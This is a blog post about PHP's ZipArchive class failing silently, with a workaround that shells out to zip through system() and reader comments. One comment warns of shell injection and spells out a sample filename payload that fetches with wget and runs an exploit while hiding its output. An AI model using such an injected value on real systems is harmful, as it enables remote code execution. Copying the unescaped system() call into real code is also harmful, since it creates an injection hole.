This is very rare, PHP’s extensions are usually well done but this one, ZipArchive class is very annoying and I’m very surprised that it’s now in PHP’s distribution…
In my case, it doesn’t create the archive for some reason and it doesn’t throw any errors either.
http://us3.php.net/manual/en/class.ziparchive.php
I’m very disappointed and I wasted a lot of time and yes, all the permissions etc. are right.
So ended up using system calls; first create a temporary folder and then something like:
system("zip -r THE_ZIP_FILE.zip PATH_TO_THE_TMP_FOLDER");
And now the problem with this is that it’s not portable, it’s fine in my case though.
10 Comments 
Leave a comment
I'm the co-founder of
You have to make sure the filename and temp path does not contain shell meta characters. If an attacker can control, e.g., the “THE_ZIP_FILE” part, he can set it to “zz.zip /tmp ; { wget blabla ; sh ./exploit ; > /dev/null 2>&1 }; true ” and you will not even see anything in the error log.
Comment
Everything in that command is generated by me and not by the user but that is right, whoever wants to use it must be careful…
Comment
Did you ever get to the bottom of why you couldn’t get the ZipArchive class to save?
I’m having the exact same problem, and I’m tearing my hair out because I need it to work! PHP on my server isn’t allowed to execute commands or system calls, so this seems to be the only solution.
Thanks
Comment
Sadly, I didn’t find a solution, I have a dedicated server so I can use system calls; I would bug the developer about this…
Comment
Same problem here. This is so annoying. And the ZipArchive status reports “No error”.
Comment
There are many classes for zip in http://www.phpclasses.org … even i had this same problem … and i used one which worked perfectly well and did the job … plz search at the given link … i dont remember the name exactly..
btw your blog is kool and very informative
Comment
I also can’t seem to get this silly class to work.
However, I find that if I post comments to blog articles I normally figure it out just after. So hopefully I’ll post back soon!
Comment
The ZipArchive class has been working pretty nice for me, I’m building tens of zip distrib files for various applications.
Comment
I have the same problem
the skript works on a iis server without fascgi and default website and fails on a server with fastcgi and a name based website….
perhaps this is related
Comment
Hi I’m having the same problem, the thing is when i used the system call it gave me this response in the console “zip warning: zip file empty”
what could it be?
Comment